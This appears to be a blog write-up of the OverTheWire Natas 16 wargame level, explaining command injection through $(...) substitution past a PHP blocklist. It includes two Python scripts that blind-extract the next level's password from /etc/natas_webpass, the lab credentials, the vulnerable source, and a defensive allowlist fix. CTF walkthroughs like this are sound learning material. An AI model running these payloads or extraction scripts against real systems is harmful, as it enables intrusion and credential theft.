16. 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
- This level tests the case where command execution filters out the characters shown in the source code below; command substitution with $(command) is not filtered and can still be used.
- Reading the source code shows that a grep can be nested inside the outer grep.
- For example: grep -i $(grep -i a natas17.txt) dictionary.txt
- So the final probe looks like this: $(grep a /etc/natas_webpass/natas17)abacus
- Hence the following Python script is used:
#!/usr/local/bin/python3
# -*- coding=utf-8 -*-
# Author: Xiaoyunqi
import requests
from string import ascii_lowercase
from string import ascii_uppercase

chars = ascii_lowercase + ascii_uppercase + "0123456789"
pwd = ""
isDone = False
# print(chars)
while not isDone:
    for char in chars:
        # Anchor the guess to the start of the line so it extends the known prefix.
        searchPattern = '^' + pwd + char
        r = requests.post("http://natas16.natas.labs.overthewire.org/index.php",
                          data={'needle': '$(grep ' + searchPattern + ' /etc/natas_webpass/natas17)abacus'},
                          auth=('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'))
        # If the inner grep matched, its output replaces the empty substitution and
        # "abacus" no longer matches the dictionary, so its absence confirms the prefix.
        if b"abacus" not in r.content:
            pwd += char
            print('Character "' + char + '" found')
            break
    else:
        # No character extended the prefix: the password is complete.
        isDone = True
print(pwd)
- The final output of the run is as follows:
Character "8" found
Character "P" found
Character "s" found
Character "3" found
Character "H" found
Character "0" found
Character "G" found
Character "W" found
Character "b" found
Character "n" found
Character "5" found
Character "r" found
Character "d" found
Character "9" found
Character "S" found
Character "7" found
Character "G" found
Character "m" found
Character "A" found
Character "d" found
Character "g" found
Character "Q" found
Character "N" found
Character "d" found
Character "k" found
Character "h" found
Character "P" found
Character "k" found
Character "q" found
Character "9" found
Character "c" found
Character "w" found
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
- Another version of the Python code:
#!/usr/local/bin/python3
# -*- coding=utf-8 -*-
# Author: Xiaoyunqi
import requests
from string import ascii_lowercase
from string import ascii_uppercase

url = "http://natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh@natas16.natas.labs.overthewire.org/"
key = ''
# char = ascii_lowercase + ascii_uppercase + "0123456789"
char = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
# The password is 32 characters long; stop once it has been recovered.
while len(key) < 32:
    for i in char:
        # "wrong" is appended to the substitution; it matches the dictionary only
        # when the inner grep produced no output, i.e. the guessed prefix is wrong.
        payload = {'needle': '$(grep ^' + key + i + '.* /etc/natas_webpass/natas17)wrong',
                   'submit': 'Search'}
        req = requests.get(url=url, params=payload)
        if 'wrong' not in req.text:
            key += i
print(key)
- Source code:
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }
}
?>
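The filter above blocks six shell metacharacters but not `$`, `(` or `)`, so the needle is still interpolated into a shell command line. As an added illustration from the defender's side (this is not code from the original page or from the Natas level), the following Python reproduces the page's blocklist, shows that the page's own probe string passes it, and contrasts it with an allowlist plus a shell-free grep invocation. The sample dictionary words and the allowlist pattern are constructed for the example.

```python
import re
import shutil
import subprocess

# Constructed sample dictionary standing in for the level's dictionary.txt.
SAMPLE_DICTIONARY = ["abacus", "abandon", "zebra"]

# The character blocklist from the page's PHP source: ; | & ` ' "
PHP_BLOCKLIST = re.compile(r"""[;|&`'"]""")

# Assumed allowlist: only characters a dictionary word can contain, bounded length.
NEEDLE_ALLOWLIST = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def blocklist_allows(needle: str) -> bool:
    """Mirror of the page's preg_match check: True when the input is accepted."""
    return PHP_BLOCKLIST.search(needle) is None


def allowlist_allows(needle: str) -> bool:
    """Positive validation: accept only what a search term may look like."""
    return NEEDLE_ALLOWLIST.fullmatch(needle) is not None


def build_safe_argv(needle: str, dictionary: str = "dictionary.txt") -> list:
    """Argument vector for grep with no shell in between.

    The allowlist rejects metacharacters outright, and '--' ensures a needle
    beginning with '-' cannot be parsed as a grep option.
    """
    if not allowlist_allows(needle):
        raise ValueError("needle rejected by allowlist")
    return ["grep", "-i", "--", needle, dictionary]


def search_in_memory(needle: str, words: list) -> list:
    """Shell-free equivalent of grep -i over an in-memory word list."""
    if not allowlist_allows(needle):
        raise ValueError("needle rejected by allowlist")
    n = needle.lower()
    return [w for w in words if n in w.lower()]


def run_grep(needle: str, dictionary: str) -> str:
    """Run grep via argv (shell=False); the needle is never re-parsed by a shell."""
    proc = subprocess.run(build_safe_argv(needle, dictionary),
                          capture_output=True, text=True, check=False)
    return proc.stdout


if __name__ == "__main__":
    probe = "$(grep a /etc/natas_webpass/natas17)abacus"  # the page's probe string
    print("blocklist accepts probe:", blocklist_allows(probe))   # True: the gap
    print("allowlist accepts probe:", allowlist_allows(probe))   # False
    print("safe search:", search_in_memory("aba", SAMPLE_DICTIONARY))
    if shutil.which("grep"):
        print("argv for grep:", build_safe_argv("abacus"))
```

Even with the allowlist, passing a list to subprocess (or, in PHP, wrapping the argument with escapeshellarg and avoiding passthru on a string) is the control that actually removes the injection: the validator narrows the input, the argv form removes the shell that would interpret it.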
Recommended reading:
https://medium.com/hacker-toolbelt/natas-16-command-injection-with-zap-and-python-bb95fbc8f5ac
Disclaimer: The articles I write are for learning and research only. Do not use the techniques or source code in them for illegal purposes; any negative impact caused by anyone, or any violation of the law, has nothing to do with me.